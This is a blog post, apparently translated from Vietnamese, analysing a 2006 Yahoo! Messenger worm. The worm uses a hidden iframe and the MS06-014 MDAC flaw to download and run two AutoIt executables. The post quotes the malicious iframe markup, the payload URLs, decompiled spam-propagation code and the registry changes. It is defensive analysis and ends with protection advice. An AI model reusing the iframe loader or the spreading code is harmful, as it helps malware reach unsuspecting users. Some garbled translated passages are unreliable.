I didn't do anything other than yesterday (and maybe all day) besides sitting and supporting the problem solving on the database system at the office. Arriving home at 11pm, tired of going to sleep, suddenly remembered that today the Vietnam Olympic team kicked with some team so I went online to see the news about that match. Just trying to go to bed, suddenly, I received a message on Yahoo! Messenger:
thuong ghe ^, vinatad is hacking you ui, hic :( http:///www.vinatad./index.html
'Fight' with Vinatad Picture 1 I don't like anything like this, but this is the 4th time of the day I received 4 different messages and informed about this attack. Curious, I clicked on the link and it displayed a msg like this:
website has BKAV - That site has security by BKAV hacked by bkgenetic_g11
Well, this index.html page doesn't simply have those two lines because NoScript tells me that a script has been blocked. Curious, I looked at its source code and saw the following:
hacked by bkgenetic_g11 [title] website has BKAV - That site has seccurity by BKAV [/ title] [iframe name = "quag" frameSpacing = "0" src = "http:///www.free.s.com/iamblackhat/google.html" frameBorder = "0" noResize width = "0" height = "0 "target =" _ self "]
There is a hidden iframe pointing to http:///www.free.s.com/iamblackhat/google.html . The source code for google guy. Except for the i.js file of Freewebs service used to insert banner ads, the entire script is quite interesting. As you can see, the purpose of this script is to download and run the two files http:///www.vinatad./game.exe and http:///www.vinatad./zend.exe . To do that, the author exploits the vulnerability MS06-14:
Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)
Một mã xa đã thực hiện hiện thời có quyền hạn trong RDS.Dataspace ActiveX control that is provided as part of the ActiveX Data Objects (ADO) and that is distributed in MDAC. An attacker thành công đã được kết thúc này, có thể xử lý không thể thực hiện điều khiển của hệ thống tương ứng.
This vulnerability was patched by Microsoft in April 2006, but it is still used a lot in browser-based exploits because it is easy to exploit and is quite effective because it is relatively new. Interestingly, the author took advantage of AJAX technology through the Microsoft.XMLHTTP object to silently download the virus to the victim's computer.
Listening to the made-in-VN virus, you probably guessed it used AutoIt to spread on Yahoo! Messenger as a lot of children have appeared in series recently. The difference of this virus is that it exploits a vulnerability in Internet Explorer, then through AJAX to automatically install smoothly. If you have not updated your Internet Explorer, just click on the link sent on Yahoo! Messenger is immediately infected with your computer.
I quickly downloaded two files http:///www.vinatad./zend.exe and http:///www.vinatad./game.exe . Scan results with VirusTotal are as follows:
Antivirus Version Update Result AntiVir 7.2.0.39 11.16.2006 no virus found Authentium 4.93.8 11.16.2006 no virus found Avast 4.7.892.0 11.15.2006 no virus found AVG 386 11.15.2006 no virus found BitDefender 7.2 11.16.2006 no virus found CAT-QuickHeal 8.00 11.15.2006 TrojanDownloader.Agent.axn ClamAV devel-20060426 11.16.2006 no virus found DrWeb 4.33 11.16.2006 no virus found eTrust-InoculateIT 23.73.57 11.16.2006 no virus found eTrust-Vet 30.3.3195 11.16.2006 no virus found Ewido 4.0 11.15.2006 no virus found Fortinet 2.82.0.0 11.16.2006 no virus found F-Prot 3.16f 11.16.2006 no virus found F-Prot4 4.2.1.29 11.16.2006 no virus found Ikarus 0.2.65.0 11.15.2006 no virus found Kaspersky 4.0.2.24 11.16.2006 no virus found McAfee 4896 11.15.2006 no virus found Microsoft 1.1609 11.16.2006 no virus found NOD32v2 1868 11.15.2006 no virus found Norman 5.80.02 11.15.2006 no virus found Panda 9.0.0.4 11.15.2006 no virus found Prevx1 V2 11.16.2006 no virus found Sophos 4.11.0 11.15.2006 no virus found TheHacker 6.0.1.119 11.15.2006 Trojan / Downloader.AutoIt.e UNA 1.83 11.15.2006 Backdoor.Agent.9 VBA32 3.11.1 11.15.2006 no virus found VirusBuster 4.3.15: 9 11.15.2006 no virus found
Only three antivirus software identified are game.exe and zend.exe . Preliminary analysis of strings shows that both files use the AutoIt engine and are packaged with UPX. I unpacked and loaded them onto the VMWare virtual machine running Windows XP Service Pack 2. It's easy to decompile the AutoIt source code of both of them because they don't use any protection method. Just use the existing Exe2AU program of AutoIt that I already have their source code in hand:
; AUT2EXE VERSION: 3.2.0.1 ; -------------------------------------------------- -------------------------- ; AUT2EXE INCLUDE-START: E: hoc tapnewhackdungyeuanh_mophatTeachokRungame.au3 ; -------------------------------------------------- -------------------------- ; ------------------------------------------------ ; Phan Mem: DKC Bot ; Board: 1.1 ; Cong Dung: Quang Cao Website through Y! M ; Hoan Thanh: September 1, 2006 ; ------------------------------------------------- ------
The initial feeling is that these two AutoIt have a simpler function than the other AutoIt I have met before. The source code of zend.exe even has only 3 lines:
while (99999999) ping ("localhost", 1) WEnd
The source code of game.exe is quite "classic", divided into components such as:
; Thiet Lap #NoTrayIcon $ trinhduyet = "hacked by bkgenetic_g11" $ ngaunhien = Random (0.9,1) ; Ngau Nhien website Dim $ web [10] $ website = "http:///www.vinatad./index.html" $ include = "http:///www.vinatad./hotline.html" ; Tin Nhan Ngau Nhien Dim $ news [10] $ tin [0] = "that site hacked by bkgenetic_g11 via nutrition, phuc that, hic" & $ website $ news [1] = "thuong ghe ^, vinatad is hacked you ui, hic :(" & $ website $ news [2] = "This is a poet's hand, hic :(" & $ website $ news [3] = "Den chiu, vinatad ca bi hack, VNiss lam ma ??? :))" & $ website $ tin [4] = "bun ghe, hack hui rui ^" & $ website $ news [5] = "that site hacked by bkgenetic_g11 via nutrition, phuc that, hic)" & $ website $ believe [6] = "Den chiu, no gi de noi :))))" & $ website $ believe [7] = "thuong ghe ^, vinatad bi hack you ui, hi :))" & $ website $ news [8] = "en chiu, vinatad ca bi hack, VNiss lam ma ?? :(" & $ website $ tin [9] = "en chiu, vinatad ca bi hack, VNiss lam ma ?? :(" & $ website $ tinnhan = $ tin [$ ngaunhien] ; Lay Nhiem Vao He Thong ; Remember the Registry ; Replace Status & Gui Tin Nhan
When infecting the system, game.exe will copy itself into file C: Windowstaskmng.exe . Then it starts to change some information in the Registry to:
- Automatically run when Windows starts
- Modify the homepage of Internet Explorer
- Disable regedit tool and Task Manager
- Modify the Launchcast address of Yahoo! Messenger
Finally, as usual, it began to spread by sending mass messages via Yahoo! Messenger and change the status of infected people.
Although this virus is not very dangerous, the author can completely replace game.exe or zend.exe with other more powerful versions, can be written in AutoIt or edit the available source code of viruses and bots are full on the Internet. Then with the help of Yahoo! Messenger and the vulnerabilities of Internet Explorer and disaster are entirely possible. How to protect yourself? Firefox + NoScript will be a viable solution.